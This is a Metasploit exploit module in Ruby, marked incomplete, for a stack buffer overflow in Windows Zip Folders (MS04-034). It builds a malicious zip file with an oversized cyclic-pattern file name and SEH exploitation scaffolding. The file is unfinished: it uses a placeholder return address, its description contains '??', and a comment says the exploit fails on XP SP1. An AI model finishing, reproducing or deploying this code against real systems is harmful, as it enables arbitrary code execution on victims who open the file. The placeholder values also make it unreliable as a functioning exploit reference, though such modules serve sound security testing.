##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'


class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Windows Zip File Handling Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow vulnerability in
				Windows Zip Folders prior to MS04-034.

				In order for the command to be executed, an attacker must convince someone to
				open a specially crafted zip file and ??

				By doing so, an attacker can execute arbitrary
				code as the victim user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Tarako',
					'jduck'
				],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0575' ],
					[ 'MSB', 'MS04-034' ],
					[ 'OSVDB', '10695' ],
					[ 'OSVDB', '12252' ],
					[ 'BID', '34044' ],
					[ 'URL', 'http://research.eeye.com/html/advisories/published/AD20041012A.html' ]
				],
         'Platform'       => [ 'win' ],
         'Payload'        =>
				{
					'Space'    => 0x800,
					'BadChars' => ''
				},
			'Targets'        =>
				[
					['Windows Universal', { 'Ret' => 0x41424344 }], # p/p/r
				],
			'DisclosureDate' => 'Oct 12 2004',
			'DefaultTarget'  => 0))

		register_options(
		 	[
				OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
			], self.class)

	end


	def exploit

		# XXX: Unable to trigger on XP SP1
		fname = Rex::Text.pattern_create(0x9200)

		content = rand_text_alphanumeric(rand(2048))

		zip = Rex::Zip::Archive.new
		xtra = [0xdac0ffee].pack('V')
		comment = [0xbadc0ded].pack('V')
		zip.add_file(fname, content, xtra, comment)

		# Create the file
		print_status("Creating '#{datastore['FILENAME']}' file...")

		file_create(zip.pack)
	end

end
